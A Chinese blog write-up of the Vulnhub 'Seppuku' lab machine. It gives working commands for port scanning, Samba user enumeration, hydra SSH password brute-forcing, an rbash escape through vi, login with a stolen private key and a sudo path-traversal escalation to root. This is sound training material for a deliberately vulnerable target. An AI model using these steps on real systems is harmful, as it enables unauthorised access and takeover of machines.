首页 > 其他分享 >Vulnhub:Seppuku靶机

Vulnhub:Seppuku靶机

时间:2023-03-04 19:55:05浏览次数:37  
标签:bin .. Seppuku 用户 192.168 111.212 Vulnhub tanto 靶机

kali:192.168.111.111

靶机:192.168.111.212

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.212

image

对samba服务进行枚举发现三个系统用户

enum4linux -a 192.168.111.212

image

在7601端口下的secret目录发现password.lst密码字典,配合收集到的系统用户爆破ssh

hydra -L user.txt -P password.txt 192.168.111.212 -s 22 ssh -t 64

image

image

提权

通过vi编辑器绕过rbash

vi
:set shell=/bin/bash
:shell

image

image

在seppuku用户加目录下发现.passwd文件

image

尝试后发现可以切换到samurai用户

image

samurai用户sudo权限,提权需要在tanto用户家目录下创建文件

image

在/var/www/html/keys目录下发现tanto用户的ssh私钥

image

使用该私钥登录目标

ssh [email protected] -i id_rsa

image

在tanto用户加目录下创建.cgi_bin目录,目录下创建名称为bin的可执行文件

mkdir -p .cgi_bin/bin
cd .cgi_bin
echo '/bin/bash' > bin
chmod 777 bin

image

使用samurai用户执行以下命令提升为root

sudo -u root /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

image

flag

image

标签:bin,..,Seppuku,用户,192.168,111.212,Vulnhub,tanto,靶机
From: https://www.cnblogs.com/ctostm/p/17178955.html

相关文章

  • Vulnhub之UnInvited靶机测试过程
    UnInvited识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/UnInvited]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|Screen......
  • Vulnhub:Five86-2靶机
    kali:192.168.111.111靶机:192.168.111.211信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.211wpscan收集目标wordpress用户wpscan--url......
  • Vulnhub之View2akill靶机测试过程(部分)
    View2akill识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|......
  • vulnhub靶场之MATRIX-BREAKOUT: 2 MORPHEUS
    准备:攻击机:虚拟机kali、本机win10。靶机:Matrix-Breakout:2Morpheus,下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova,下载后直接......
  • 靶机练习6: BSS(Cute 1.0.2)
    靶机地址https://www.vulnhub.com/entry/bbs-cute-102,567/信息收集进行全端口扫描,确认目标开放端口和服务nmap-n-v-sS--max-retries=0-p-172.16.33.9对开放......
  • Hack the box靶机列表(类似OSCP lab的靶机)
     Linux的靶机列表Windows的靶机列表比OSCP更具挑战性的靶机列表,但值得练习2022年更新的靶机列表 5LamelegacyJeeves[Windows]Backdoor[Linux]  ......
  • OSCP练习靶机
    搞不到OSCP官方泄露的lab,只好搞一些有质量的、相似的靶机来练习首先感谢大哥的分享(34条消息)和oscp相似的靶机-hackthebox&vulnhub(OSCP-LIKEHACKTHEBOX&VULNHUB)......
  • [Vulnhub] MY FILE SERVER: 1
    下载地址0x00配置攻击机IP:192.168.10.5靶机IP:192.168.10.40x01攻击用Namp扫描靶机开放的端口┌──(root㉿azwhikaru)-[~]└─#nmap-A192.168.10.4......
  • [Vulnhub] DC: 1
    下载地址0x00配置攻击机IP:192.168.10.5靶机IP:192.168.10.60x01攻击用Namp扫描靶机开放的端口┌──(root㉿azwhikaru)-[~]└─#nmap-sC-sV-p-192.16......
  • 靶机练习5: Sar
    靶机地址https://www.vulnhub.com/entry/sar-1,425/信息收集阶段进行全端口扫描,枚举目标的端口和服务nmap-n-v-sS--max-retries=0-p-172.16.33.13nmap-sV-p......